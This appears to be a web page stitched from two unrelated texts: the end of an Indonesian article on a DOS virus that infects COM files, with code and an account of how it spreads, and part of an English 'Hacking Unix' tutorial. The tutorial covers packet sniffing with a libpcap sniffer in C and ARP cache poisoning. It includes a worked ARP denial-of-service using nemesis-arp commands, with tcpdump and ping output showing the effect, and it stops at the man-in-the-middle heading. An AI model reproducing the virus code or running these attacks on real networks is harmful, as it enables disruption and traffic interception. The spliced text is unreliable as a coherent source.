Buka_file Nama_file,Open_code
Pop ax
Tulis_file bx,buffer,ax
Tutup_file bx
Tulis_string identitas
Ke_dos

Cari_lainnya : pop ax
pop bx
Tutup_file bx
Find_next
Jmp masih_adakah
Buffer Label byte
Code_seg ENDS
END mulai



4. Penjelasan

Awal dari penularan dimulai ketika program virus ini dijalankan pada disket yang berisi file-file COM.Virus mula-mula akan menulari file COM yang pertama (berdasarkan urutan file-file pada disket).Dengan penularan ini, maka file tersebut menjadi sumber penularan baru, dan virus yang asli dapat dihapus.File-file yang telah tertular ukurannya tidak berubah.
Bila file yang telah tertular itu dijalankan, maka file itu tidak dapat menjalankan fungsinya dan hanya akan menampilkan pesan :”File ini telah tertular Virus komputer!”.Sebelumnya, file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam directory utama adalah COMMAND.COM, maka setiap kali melakukan boot dengan disket itu, tak akan pernah berhasil dan sebelumnya virus akan menulari sebuah program COM lain yang belum tertular.
Harapa diperhatikan bahwa virus ini tidak dapat bekerja dengan baik bila berada pada file COM yang ukurannya lebih kecil daripada ukuran program virus yang asli, atau terlalu besar (mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara lengkap atau buffer telah melampaui batas daerah CS (Code Segment)






Demikianlah Artikel yang dapat saya sampaikan pada kesempatan ini, Semoga informasi yang saya sampaikan dapat bermanfaat bagi pengetahuan bagi kita semua ,khususnya bagi yang concern terhadap virus.Sekian terima kasih cao……:) :) :)

[+/-] terus diwoco bang...!!!!

HACKING UNIX PART FIVE

PASSIVE NETWORK ATTACKS
-----------------------------------


& ** This is a multi-part tutorial,
& ** please check our website for other
& ** parts:
& ** http://www.duho.org/
&

INDEX:

1. - Introduction
2. - Sniffing shared networks
2.1 - Introduction
2.2 - Sniffer construction
2.3 - Sniffer detection
2.3.1 - Local
2.3.2 - Remote
3. - Sniffing switched networks
3.1 - Introduction
3.2 - ARP poisoning
3.2.1 - ARP Introduction
3.2.2 - ARP table poisoning
3.2.3 - DoS
3.2.4 - ARP Man in the Middle
3.2.5 - Detection
3.3 - Switch table poisoning
3.3.1 - Switch Introduction
3.3.2 - Switch redirection
3.3.3 - Man in the Middle

1. Introduction

So far we've been using knowledge about network protocols for information
gathering. In this part I will introduce you to using weaknesses in
networks for merely passive attacks.
{
A passive attack - unlike an active attack - does not (or less)
require the attacker to induce an exploit condition. In a passive
attack the attacker waits for the victim to make itself
vulnerable.
}
We will exploit these weaknesses to cause denial of service or remote
compromise of our target host.

2. Sniffing shared networks

2.1 Introduction

You have probably already heard of the term `sniffing'. Sniffing - when
used malicously - is a passive attack method. Sniffing will be discussed
first because sniffing will be used later for other attacks.

Sniffing basically is capturing network packets on the network. The
network packets ofcourse can contain valueable information.
Based on what information we want to sniff we divide sniffing in two
categories: header sniffing and data sniffing.

Header sniffing is usually used for network problem analyses purpose or
to learn more about network protocols.
{
A header means `protocol header of a packet'.
A header is like an envelope with addressing information and some
other information of a specific protocol.
This has been discussed in part 2 of Hacking Unix.
Header sniffing is displaying information from packet headers.
}
With header sniffing one can keep track of the sort of connections and
messages that pass the wire.

Data sniffing is almost always used for malicious purpose.
Data sniffing means capturing the payload (content) of each packet. For
example, a sniffer program may be able to record files being exchanged
through FTP data sessions, or email. But more likely a hacker will use a
password sniffer, which is also sort of a data sniffer that captures
logins and passwords of most well-known protocols (FTP, POP, TELNET).
{
Dsniff is a well-known data and password sniffer.
You can get it at:
http://naughty.monkey.org/~dugsong/dsniff/
}

2.2 Sniffer construction

A typicall sniffer program uses two key things:

* Raw socket
* Promisuous (optional) network interface

A sniffer registers a raw socket, which gives the sniffer access to all
packets that arrive at the kernel (the operating system). A socket is an
interface for the program and the kernel's network subsystem to
communicate with each other (network packets). When a program registers a
raw socket, this means that the kernel will send all packets it receives
to the raw socket as well.

A raw socket is opened with the socket() call with `SOCK_RAW' as `Type'
argument. I.e.: socket( AF_INET, SOCK_RAW, 0 );
{
Only a privileged user can open a raw socket
}

A network interface only passes packets destined to itself (it's adapter
address(MAC)) to the kernel (by default). Unless the network adapter is
set to `promiscuous mode'.
{
Only a privileged user can set the network device to promiscuous
mode
}
In Linux you can set the device in promiscuous mode using the ifconfig
command in this way:

ifconfig promisc

If your interface is eth0 you can do:

ifconfig eth0 promisc

How a sniffer program can open a network device in promiscuous mode will
be discussed later.

When the network device is in promiscuous mode, all data that goes over
the wire will be forwarded to the operating system. The kernel forwards
the packets to it's own IP module and to any open raw sockets. A malicious
(privileged) user or simply the admin can monitor all unencrypted traffic
that passes the wire.

When you are on a shared network architecture like a ring, bus or hubbed
star network, you will be able to sniff all the data that is on the LAN.
In a switched network, the switches know (learn) on which line (or `port')
every host is, and will send packets directly to the destination, which
means that each host should only receive packets destined to itself. A
switch improves security a little and increases network performance. There
are techniques to make the switch leak packets to the wrong lines which
will be discussed later.

Sniffers are hard to detect because it is a passive `attack' method. There
are methods to detect sniffers locally as well as remotely which will be
discussed in chapter 2.3.

A sniffer registers a raw socket. Raw sockets allow for user-space
processing of packets. They could be used to development new low-level
protocols in userspace for example. A normal network application
doesn't have to take care of lower level protocol details, the kernel's
networking stack does all this.
{
Programmers talk about "networking stack" or "TCP/IP stack"
because of the layered model that together form a stack.
}
The application receives the data send by the connected remote application
from the kernel using simple read() or recv() calls. The socket is the
interface between the kernel's TCP/UDP/IP (or whatever) stack and the
userspace application. A raw socket in contrary has access to all packets
that travel by. Which is why only a privileged process can open a raw
socket.

A raw socket programmer needs to have fairly good understanding of
protocol details. Information on how to handle the different protocols can
be found in their corresponding RFC's and in your operating system's
header files.
{
For non-programmers; "Header files" ofcourse have nothing to do
with "protocol headers". "Header files" or "include files" define
data types and functions available in the operating system's
library which the program will be linked with.
}

The operating system's header files define data structures for various
protocols which we can use to process various protocols.
For example, here's the IP header structure from the netinet/ip.h include:

/*
* Structure of an internet (IP) header, naked of options.
*/
struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ip_hl:4; /* header length */
unsigned int ip_v:4; /* version */
#endif
#if __BYTE_ORDER == __BIG_ENDIAN
unsigned int ip_v:4; /* version */
unsigned int ip_hl:4; /* header length */
#endif
u_int8_t ip_tos; /* type of service */
u_short ip_len; /* total length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
u_int8_t ip_ttl; /* time to live */
u_int8_t ip_p; /* protocol */
u_short ip_sum; /* checksum */
struct in_addr ip_src, ip_dst; /* source and dest address */
};

For a sniffer program you can just #include this file, so you don't have
to study the RFC again. You can conveniently map the packet into the
structure, you just make a pointer with the type of that structure and
point it to the beginning of the IP header, which is calculated like this:

/* make pointer to ip header */
ip = (struct ip*)(packet + sizeof(struct ether_header));

Herein, `packet' is a pointer to the packet.
The packet looks like this in memory:

FFh
--------------------
| Application data |
--------------------
| TCP Header |
--------------------
| IP Header |
-------------------- <- (const struct ip *ip)
| Ethernet Header |
-------------------- <- (const u_char *packet)
00h

The structure ether_header{} is defined in net/ethernet.h. If we know the
size of the ethernet header we can add that to the value in `packet' (the
pointer) after which we point to the ip header. The struct ip perfectly
matches the fields in the IP Header. Now we can read out the IP
header values through the structure without worrying about where every IP
field is located.
We can use this to write a simple header sniffer.
{
To make a password sniffer, you have to find out where in the
packet the username and password will be for the various protocols
you want to sniff
}

Sadly, not all operating systems and hardware architectures work the same
way.
Some architectures have a different byte ordering and operating system have
different means of using raw sockets. Luckily there is a library called
`libpcap'; the packet capturing library. It works on many UNIX-like systems.
You can make portable programs that use raw sockets with it.
{
Portable means that the program can be built on different kinds of
operating systems and computer architectures (intel, sparc,
powerpc etc.).
}

Although I don't want to write a pcap tutorial, I will write a simplified
header sniffer. Tutorials on programming with pcap can be found on
http://www.tcpdump.org/. If you are not a programmer, then you shouldn't
worry if you don't understand any of this code. This code is just a sample
skeleton code, it is only usable to try out some things. If you are a
programmer i think you can write a complete sniffer after reading this
code.

There are much much better sniffers around. Like ethereal
(http://www.ethereal.com) that also use libpcap. And the tcpdump source
itself is a good read.

-- begin husniffer.c --
/*
* sniffer for Hacking UNIX by detach [http://www.duho.org/]
*
* Compile: gcc -o husniff husniff.c -lpcap
* Run: ./husniff [filter expression]
* Example: ./husniff 'port 23'
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

enum boole {
FALSE,
TRUE
};

#define IPv 4

void
proc_icmp( const u_char *packet, int eth_len, int ip_len )
{
struct icmphdr *icptr;

icptr = (struct icmphdr*) (packet+eth_len+ip_len);

switch (icptr->type)
{
case ICMP_ECHOREPLY:
printf("Echo Reply\n");
break;
case ICMP_DEST_UNREACH:
printf("Destination Unreachable: ");
switch(icptr->code)
{
case ICMP_NET_UNREACH:
printf("Net Unreachable\n");
break;
case ICMP_HOST_UNREACH:
printf("Host Unreachable\n");
break;
case ICMP_PROT_UNREACH:
printf("Protocol Unreachable\n");
break;
case ICMP_PORT_UNREACH:
printf("Port Unreachable\n");
break;
case ICMP_FRAG_NEEDED:
printf("Fragmentation needed\n");
break;
case ICMP_SR_FAILED:
printf("Source route failed\n");
break;
case ICMP_NET_UNKNOWN:
printf("Net Unknown\n");
break;
case ICMP_HOST_UNKNOWN:
printf("Host Unknown\n");
break;
case ICMP_HOST_ISOLATED:
printf("Host Isolated\n");
break;
case ICMP_NET_ANO:
printf("Access to network prohibited\n");
break;
case ICMP_HOST_ANO:
printf("Access to host prohibited\n");
break;
case ICMP_NET_UNR_TOS:
printf("Net Unreachable for that Type Of Service\n");
break;
case ICMP_HOST_UNR_TOS:
printf("Host Unreachable for that Type Of Service\n");
break;
case ICMP_PKT_FILTERED:
printf("Packet filtered\n");
break;
case ICMP_PREC_VIOLATION:
printf("Precedence violation\n");
break;
case ICMP_PREC_CUTOFF:
printf("Precedence cut off\n");
break;
default:
printf("Unknown code for this ICMP message type!\n");
}
break;
case ICMP_SOURCEQUENCH:
printf("Source Quench\n");
break;
case ICMP_REDIRECT:
printf("Redirect\n");
switch(icptr->code)
{
case ICMP_REDIR_NET:
printf("Redirect Net\n");
break;
case ICMP_REDIR_HOST:
printf("Redir Host\n");
break;
case ICMP_REDIR_NETTOS:
printf("Redirect Net for TOS\n");
break;
case ICMP_REDIR_HOSTTOS:
printf("Redir Host for TOS\n");
default:
printf("Unknown code for this ICMP message type!\n");
}
break;
case ICMP_ECHO:
printf("Echo Request\n");
break;
case ICMP_TIME_EXCEEDED:
printf("Time Exceeded: ");
switch( icptr->code )
{
case ICMP_EXC_TTL:
printf ("TTL exceeded\n");
break;
case ICMP_EXC_FRAGTIME:
printf ("Fragment reassembly exceeded\n");
break;
default:
printf("Unknown code for this ICMP message type!\n");
}
break;
case ICMP_PARAMETERPROB:
printf("Parameter Problem\n");
break;
case ICMP_TIMESTAMP:
printf("Time Stamp\n");
break;
case ICMP_TIMESTAMPREPLY:
printf("Time Stamp Reply\n");
break;
case ICMP_INFO_REQUEST:
printf("Info Request\n");
break;
case ICMP_INFO_REPLY:
printf("Info Reply\n");
break;
case ICMP_ADDRESS:
printf("Address Mask Request\n");
break;
case ICMP_ADDRESSREPLY:
printf("Address Mask Reply\n");
break;
default:
printf("Unknown ICMP Type[%d]\n", icptr->type);
}
}

void
proc_pkt( u_char *args, const struct pcap_pkthdr *header, const u_char *packet )
{
char *data;
struct tcphdr *tptr;
struct udphdr *uptr;
struct ip *iptr;
struct ether_header *eptr;
struct in_addr *ap;
int tcp_len = sizeof( struct tcphdr );
int udp_len = sizeof( struct udphdr );
int ip_len = sizeof( struct ip );
int eth_len = sizeof( struct ether_header );

/* ethernet header */
eptr = (struct ether_header*)(packet);

if (header->caplen < sizeof(struct ether_header))
{
fprintf( stderr, "Truncated packet!\n" );
return;
}

/* Only IP packets */
/* Add ARP, RARP support yourself */
if (ntohs(eptr->ether_type)==ETHERTYPE_IP)
{
printf("IP[%d]", header->len);
iptr = (struct ip*)(packet+eth_len);
/* do some here */
}
else
return;

if (iptr->ip_v != IPv)
{
fprintf( stderr, "Unknown IP version %d", iptr->ip_v );
return;
}

printf(" [ src; %s ", inet_ntoa(iptr->ip_src));
printf("dst; %s ] :", inet_ntoa(iptr->ip_dst));

/* switch to the appropriate protocol handler */
switch(iptr->ip_p)
{
case IPPROTO_IP:
printf(" -> DUMMY");
break;
case IPPROTO_IGMP:
printf(" -> IGMP\n");
/* do some here */
break;
case IPPROTO_ICMP:
printf(" -> ICMP: ");
proc_icmp(packet, eth_len, ip_len);
break;
case IPPROTO_UDP:
printf(" -> UDP\n");
/* do some here */
break;
case IPPROTO_TCP:
printf(" -> TCP\n");
/* do some here */
break;
default:
printf(" -> UNKNOWN[%d]\n", iptr->ip_p);
break;
}
}

int
main( int argc, char **argv )
{
char *dev, /* device name */
errbuf[PCAP_ERRBUF_SIZE];
pcap_t *handler; /* pointer to packet capture descriptor */
struct bpf_program filter; /* compiled filter */
char *app; /* uncompiled filter */
bpf_u_int32 net,
mask;

if (argc<2)
{
fprintf( stderr, "No filter set, sniffing all!\n");
app=NULL;
}
else
app = strdup(argv[1]);
dev = pcap_lookupdev( errbuf );
if (dev==NULL)
{
fprintf( stderr, "%s\n", errbuf );
exit( 1 );
}
printf( "Using device: %s\n", dev );

if (pcap_lookupnet( dev, &net, &mask, errbuf ) ==-1)
{
fprintf( stderr, "%s\n", errbuf );
exit( 1 );
}

/* open device promisc mode */
handler = pcap_open_live(dev, BUFSIZ, TRUE, 0, errbuf);
if (handler==NULL)
{
fprintf( stderr, "%s\n", errbuf );
exit( 1 );
}

/* compile filter */
if (pcap_compile( handler, &filter, app, FALSE, net ) ==-1)
{
fprintf( stderr, "ERROR: %s\n", pcap_geterr( handler ));
exit( 1 );
}

/* apply filter */
if (pcap_setfilter(handler, &filter)==-1)
{
fprintf( stderr, "ERROR: %s\n", pcap_geterr( handler ));
exit( 1 );
}

/* capture packets, handle with proc_pkt() function */
pcap_loop(handler, -1, &proc_pkt, NULL);

pcap_close(handler);

exit( 0 );
}
-- end husniffer.c --

If you don't want to use libpcap you have to write OS-dependent code.
Check the ip, tcp, ether etc. manpages of your OS. For example in Linux
you can read ip(7) etc. It is always good to read these man pages.

2.3 Sniffer detection

Even though sniffing is a passive `attack', sniffers can often be
detected locally and remotely.

2.3.1 Local

Often a sniffer will set the network device to promiscuous mode. With the
ifconfig command one can see if a device is in promiscuous mode:

# ifconfig xl0 # example on openbsd
xl0: flags=8943 mtu 1500
address: 00:01:02:00:00:00
media: Ethernet 10baseT (10baseT half-duplex)
inet 10.0.0.1 netmask 0xffffff00 broadcast 10.0.0.255
inet6 fe80::201:2ff:fe0b:36ea%xl0 prefixlen 64 scopeid 0x2
#

If you read the line with "flags=" you will see "PROMISC" there which
indicates the device is in promiscuous mode.

Ofcourse, there is no hacker that doesn't use some method to hide the
promiscuous flag of the interface, so the method is not reliable. The
hacker could have patched the ifconfig program, the kernel or used an
LKM to hide this information.

2.3.2 Remote

To detect a sniffer remotely you can think of trying to detect if the
interface is in promiscuous mode too.
What is difference does promiscuous mode make?
-> The kernel receives all packets

This causes more load on the system because the network card will generate
alot of hardware interrupts. So sniffer detection programs can for example
first ping the target system, then the detection program floods the target
with packets using a different MAC address than the target has. If the
device were in promiscuous mode this will give extra load. Then the
detection program pings again and if responses are slow it would indicate
the network device is in promiscuous mode.

One other method I discuss is the common feature in sniffers to do IP
address or hostname address lookups. When the sniffer receives packets
from some host it tries to lookup the IP address and/or hostname of the
sender (source MAC). What happens if a sniffer detection program sends
packets with an non-existing source MAC address to the broadcast address?
The host with the sniffer might generate a Reverse ARP request. Or, when
the host has a spoofed, non-existing source IP address and it tries to do
a DNS lookup on it, this would indicate a sniffer too.

There are more techniques to find out if a device is in promiscuous mode,
but this ain't a security tutorial :).

3. Sniffing switched networks

3.1 Introduction

Sniffing on switched networks should be a little harder than on
non-switched networks. In this chapter I will discuss a few techniques to
sniff traffic that you are not supposed to see.

3.2 ARP poisoning

3.2.1 ARP Introduction

ARP poisoning is a very easy and effective technique.
ARP (Address Resolutions Protocol) is a layer 3 protocol like RARP, IP
and Xerox PUP. They live on top of the link layer.
In the ethernet header there is the field `protocol type', this field
contains a 16-bit protocol ID. When the ethernet module receives a
packet destined to it's address it will read the protocol ID and give
the packet (stripped from the ethernet header) to the corresponding
layer 3 module. For example 0800h for IP.
In Linux the net/ethernet.h header file contains this information:

/* Ethernet protocol ID's */
#define ETHERTYPE_PUP 0x0200 /* Xerox PUP */
#define ETHERTYPE_IP 0x0800 /* IP */
#define ETHERTYPE_ARP 0x0806 /* Address resolution */
#define ETHERTYPE_REVARP 0x8035 /* Reverse ARP */

The ethernet header might look like this:

00 80 48 00 00 00 <- destination ethernet address (6 bytes; 48 bit)
00 01 02 00 00 00 <- source ethernet address (6 bytes; 48 bit)
08 00 <- protocol type `IP' (2 bytes; 16 bit)

You now know the position of the ARP in the OSI model:

--------------------
| ARP |
-------------------- <- layer 3
| Ethernet Link |
-------------------- <- layer 2
| Physical network |
-------------------- <- layer 1

Note that "Physical network" is just the ethernet frame being transmitted
on the wire before it reaches the ethernet module of the kernel. In case
of Ethernet it can be 10Base2 (thin-net), 10BaseT and 100BaseT (UTP),
10Base5 (thick-net). But who cares because this layer we won't have to
deal with.

The ethernet link, or simply the Link Layer is the logical link between
two systems on the same local network. The physical layer doesn't see
seperate connections.

You are probably wondering where ARP is for. It is a multi protocol
address resolution protocol. Let me explain this. I have showed you three
different layer 3 protocols. You find IP and PUP there, but there are more
protocols like DECNET and such. All these protocols share one problem.
When one of these protocols wants to send a packet, all these protocols
need to tranlate their protocol-specific address (like an IP address) to
the MAC address.
Instead of having all these protocols (like IP) implement their own
implementations of resolvers ARP was developed.

When, for example, IP wants to send a packet but doesn't know the address
of the destination, it calls the ARP module to look it up for 'm. The ARP
module looks up the IP address in the ARP cache table but doesn't find an
entry. It drops the packet and sends out an ARP Request to the broadcast
address. The packet being broadcasted causes the packet to reach every
host in the LAN. Only the host with the corresponding IP address is
supposed to reply. The requester receives the ARP reply packet and ARP
saves the MAC address along with it's corresponding IP address and a
timestamp in it's MAC table cache. Now the IP module tries to resend the
packet, and now the packet can be send.

The next time the IP wants to sent a packet to that host, the ARP will have
the answer available.
Every once in a while the ARP will want to refresh the entry to see if it's
still valid, this is called `aging'. It sends a request for all entries and
updates the entry's and adds a new time stamp.

ARP has another property, and I'll paste that from the ARP RFC #826:

---
... if A has some reason to talk to B, then B will probably have some
reason to talk to A. Notice also that if an entry already exists for the
pair, then the new hardware
address supersedes the old one ...
---

This ofcourse means that if we (host A) just send an ARP request to
another host B, then host B will add us to it's ARP table because it
assumes we want to communicate. The bonus for us is that if host A is
already in it's table, it will simply overwrite the entry.
This means that we can simply change any entry in host B's ARP table.

The specification also mentions that when host B receives an ARP reply -
even if it did not send an ARP request - it will not waste the chance to
update it's table with the received information. This way the timestamp is
renewed, and it will take some time before the entry is renewed.

3.2.2 ARP table poisoning

Over 10 years ago when they specified the ARP protocol, security wasn't
really thought of. All these decisions were made based on sparing
bandwidth.

You can understand that by spoofing the ARP packets you cause a host to
modify or add the entry which causes layer 3 addresses to be resolved to
the wrong MAC addresses.
All caused by simply by sending forged ARP replies or requests stating
that you are the host with the IP of the other end. This is ofcourse how
the ARP poisoning technique takes advantage of.

With ARP spoofing we can intercept traffic of a connection between two
hosts.
Consider this scheme:

|----------| |----------| |----------|
| Host A |----------| Switch |----------| Host B |
|----------| |----------| |----------|
192.168.0.1 | 192.168.0.2
00:20:AF:00:00:00 | 00:01:02:00:00:00
|----------|
| Host C |
|----------|
192.168.0.3
02:60:8c:00:00:00
(attacker host)

Say that Host B wants to initiate a TCP connection with Host A.
Host B does not yet have the MAC address of Host A in it's ARP table.
Before the connection is initiated Host C sends an ARP Reply packet with
the following ARP Header (simplified):

|--------------------------------------------|
| Destination: 00:01:02:00:00:00 (HB) |
| Source: 02:60:8c:00:00:00 (HC) | <- Ethernet Header
| Type: 0806h (ARP) |
|--------------------------------------------|
| Type Opcode: 0x0002 (ARP Reply) |
| Sender MAC address: 02:60:8c:00:00:00 (HC) | <- ARP Header
| Sender IP address: 192.168.0.1 (HA) |
| Target MAC address: 00:01:02:00:00:00 (HB) |
| Target IP address: 192.168.0.2 (HB) |
|--------------------------------------------|

Note: details on the ARP header will be detailed later

Such a packet could cause Host B to think that host with IP number
192.168.0.1 (Host A) has MAC address 02:60:8c:00:00:00 (Host C) which
will result in Host B sending packets to Host C when it really wants to
send them to host A. Also note that this kind of attack can easily be used
for denial of service. For example you could flood a host with spoofed ARP
reply's with nonexisting `Sender MAC' addresses.

Most ARP's in the various operating systems will add this MAC/IP pair to
the ARP cache table upon receipt of an ARP reply, but not all.
Most ARP's don't remember if they asked for the ARP Reply or not or don't
care and just add it to the table.
But a little more intelligent are the ones that only store such
information when there is a real clue that the source of the incoming
packet wants to communicate with them. For example Linux tries that. Like
I said before, if we send an ARP request to the host we want to poison we
could still get it's cache (or table) poisoned, because that host sees
that the source host has a clear interest in having it's address and
expects a new connection soon. For this we send a spoofed ARP request with
these properties:

|--------------------------------------------|
| Destination: 00:01:02:00:00:00 (HB) |
| Source: 02:60:8c:00:00:00 (HC) | <- Ethernet Header
| Type: 0806h (ARP) |
|--------------------------------------------|
| Type Opcode: 0x0001 (ARP Request) |
| Sender MAC address: 02:60:8c:00:00:00 (HC) |
| Sender IP address: 192.168.0.1 (HA) | <- ARP Header
| Target MAC address: 00:01:02:00:00:00 (HB) |
| Target IP address: 192.168.0.2 (HB) |
|--------------------------------------------|

The receiving ARP module gets the request and replies to what it thinks is
IP 192.168.0.1, but in reality is Host C (192.168.0.3).. it assumes that
192.168.0.1 will soon connect to it's system so it seems okay to store the
MAC/IP pair of 00:60:8c:00:00:00/192.168.0.1 in it's cache. Well, Host A
(192.168.0.1) doesn't contact him but the user on it's system wants to
connect to Host A. So the ethernet module calls ARP and asks if it knows
about IP 192.168.0.1, and clever ARP is happy to find it's MAC in the
table. The ethernet frame will be addressed to MAC address
00:60:8c:00:00:00 which really is Host C.

Now you are probably asking: "But how can I sniff a connection that cannot
be established?". Good one, that is being discussed later in this part
about "Man In The Middle Attack".

And now you probably want some time to play. Well first I think you
deserve some more theory about ARP ;-).

Here's what a complete ARP Request header looks like:

----
00 01 - 2 byte hardware type (0001h = ethernet)
08 00 - 2 byte protocol type (0800h = IP)
06 - 1 byte hardware address length (06h stands for 6 bytes (ethernet))
04 - 1 byte protocol address length (04h stands for 4 bytes (ip))
00 01 - 2 byte opcode (0001h is `request')
02 60 8c 00 00 00 - 6 byte sender MAC address
c0 a8 00 01 - 4 byte sender IP address (c0a80001h = 192.168.0.1)
00 01 02 00 00 00 - 6 byte target MAC address
c0 a8 00 02 - 4 byte target IP address (c0a80002h = 192.168.0.2)
----

An ARP reply has the same format, only the opcode is 0002h (reply).

We see some new fields in this complete header which weren't really
important for understanding the attack methodology, but they are important
to understand ARP. I explained that ARP is used to resolve layer 3 protocol
addresses. To make ARP layer 3 protocol independent it has a field
`protocol type' and `protocol address length'. These fields are important
to be able to handle ARP packets for different types of layer 3 protocols.

3.2.3 DoS

Now you are ready for some real hacking. We are going to poison someones
cache, please use some system you have access to so you can see the
effects.
Go to your Unix system and download the Nemesis program from
http://www.packetfactory.net/.

NOTE:
----
At the moment of writing nemesis version
1.32 does not support the latest Libnet version (1.1).
So if it doesn't compile, that is probably the problem.
This is a work-around:
Download Libnet version 1.0.2a (or another 1.0 version) in your home
directory. Now download Nemesis 1.32 to your home directory.
Change your working directory to ~/Libnet-1.0.2a and type:

./configure && make

Do not type 'make install'!

Now go to your nemesis directory.

Type './configure'.

If that worked open "./Makefile" in your favorite editor.

Go to the line with 'CFLAGS=' (at line 41 in my Makefile) and change the
line to:

CFLAGS = -Wall -O3 -funroll-loops -fomit-frame-pointer -pipe -I~/Libnet-1.0.2a/include -I/usr/local/include

Now go to the next line which should be 'LIBS ='.. change it to:

LIBS = -L~/Libnet-1.0.2a/lib -L/usr/local/lib -lpcap -lnet

Okay if you done everything right, nemesis will now link to Libnet
1.0x and should compile. Complete with; `make && make install'.

----

Okay I hope you all managed to install nemesis.

Let's do a sample denial of service attack.
Telnet or SSH to another system in your network. Find out the MAC address
of that system. My remote system was linux so i did "ifconfig eth0" and
found the MAC 00:20:AF:2E:C5:3E. Now open another term and issue this
nemesis command (requires root):

# nemesis-arp -v -S -D -h 00:00:00:00:00:00 -m -T -d eth1 -H 00:00:00:00:00:00 -M

Now your remote host should be non-responsive for some time... check it in
your other term, your telnet or ssh session must be hanging for a short
period.

My local IP address is 10.0.0.1 and my remote IP address that I have an SSH
session with is 10.0.0.20, look at this:

----
# nemesis-arp -v -S 10.0.0.1 -D 10.0.0.20 -h 00:00:00:00:00:00 -m 00:20:AF:2E:C5:3E -T -d eth1 -H 00:00:00:00:00:00 -M 00:20:AF:2E:C5:3E

ARP/RARP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes
Portions copyright (C) 2001 Jeff Nathan

ARP REQUEST

[IP] 10.0.0.1 > 10.0.0.20
[MAC] 00:01:02:0B:36:EA > 00:20:AF:2E:C5:3E
Wrote 42 byte ARP packet through linktype 1

ARP Packet Injected
#
----

Why did it hang? Well let's watch the tcpdump (sniffer) output on my other
vterm:

----
# tcpdump -i eth1 -v
tcpdump: listening on eth1
00:07:20.312987 arp reply 10.0.0.1 (0:0:0:0:0:0) is-at 0:0:0:0:0:0
----

Very well, host 10.0.0.1 sent an ARP reply with MAC address spoofed!

Well let's see if it had worked:
See the arp command output on the remote host (10.0.0.20):

----
# arp
Address HWtype HWaddress Flags Mask Iface
10.0.0.1 ether 00:00:00:00:00:00 C eth0
#
----

Yes! The host simply overwrites the address.

Okay.. now let's send a ping packet (ICMP Echo Request) from 10.0.0.20
(after poisoning arp table) to 10.0.0.1 (firewall) and record it with
tcpdump on 10.0.0.1 (i have a hubbed LAN):
** Pay attention to the time stamps..
** The -e switch enabled link layer information to be printed
** Ohyeah `fuck' is the hostname of 10.0.0.20, i couldn't come up with
** anything original back then :)

----
# tcpdump -i eth1 -e -v
tcpdump: listening on eth1
11:25:52.827366 0:20:af:2e:c5:3e 0:0:0:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
11:25:53.824663 0:20:af:2e:c5:3e 0:0:0:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
11:25:54.824680 0:20:af:2e:c5:3e 0:0:0:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
*** (and 26 more of these packets)

11:26:19.824612 0:20:af:2e:c5:3e 0:0:0:0:0:0 arp 60: arp who-has 10.0.0.1 tell fuck
11:26:19.825345 0:20:af:2e:c5:3e 0:0:0:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
11:26:20.824629 0:20:af:2e:c5:3e 0:0:0:0:0:0 arp 60: arp who-has 10.0.0.1 tell fuck
11:26:20.825364 0:20:af:2e:c5:3e 0:0:0:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
11:26:21.824644 0:20:af:2e:c5:3e 0:0:0:0:0:0 arp 60: arp who-has 10.0.0.1 tell fuck
11:26:21.825379 0:20:af:2e:c5:3e 0:0:0:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
11:26:22.824659 0:20:af:2e:c5:3e Broadcast arp 60: arp who-has 10.0.0.1
tell fuck11:26:22.824682 0:1:2:b:36:ea 0:20:af:2e:c5:3e arp 42: arp reply 10.0.0.1 is-at 0:1:2:0:0:0
11:26:22.825719 0:20:af:2e:c5:3e 0:1:2:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
11:26:22.825799 0:1:2:0:0:0 0:20:af:2e:c5:3e ip 98: 10.0.0.1 > fuck: icmp: echo reply (ttl 64, id 27574, len 84)
11:26:23.825146 0:20:af:2e:c5:3e 0:1:2:0:0:0 ip 98: fuck > 10.0.0.1: icmp: echo request (DF) (ttl 64, id 0, len 84)
11:26:23.825228 0:1:2:0:0:0 0:20:af:2e:c5:3e ip 98: 10.0.0.1 > fuck: icmp: echo reply (ttl 64, id 27575, len 84)

43 packets received by filter
0 packets dropped by kernel
#
----

Cool uh? It takes awhile before host 10.0.0.20 gives up and sends out the
ARP request.
Also note that 10.0.0.20 first sent 3 ARP Request's but to the hardware
address 00:00:00:00:00:00, so 10.0.0.1 doesn't read the packet! Then the
fourth time 10.0.0.20 decides to broadcast the packet, and then 10.0.0.1
does read the packet and sends the ARP reply.
This means that if we send a spoofed ARP reply about every 5 seconds, it
will go on forever. Let's see the output of ping on the 10.0.0.20 box:

----
$ ping 10.0.0.1
PING 10.0.0.1 (firewall): 56 octets data
64 octets from 10.0.0.1: icmp_seq=30 ttl=64 time=1.5 ms
64 octets from 10.0.0.1: icmp_seq=31 ttl=64 time=1.3 ms
64 octets from 10.0.0.1: icmp_seq=32 ttl=64 time=1.3 ms
~etcetera

--- 10.0.0.1 ping statistics ---
37 packets transmitted, 7 packets received, 81% packet loss
round-trip min/avg/max = 1.3/1.3/1.5 ms
$
----

What do you see? I see that the icmp_seq starts at 30. So the first reply we
got from 10.0.0.1 was after 31 packets! (seq starts with 0). PING - by
default - sends a packet each second, so it took about 30 seconds until ARP
renewed it's entry for 10.0.0.1 on this Linux 2.4.18 box.

3.2.4 ARP Man in the Middle

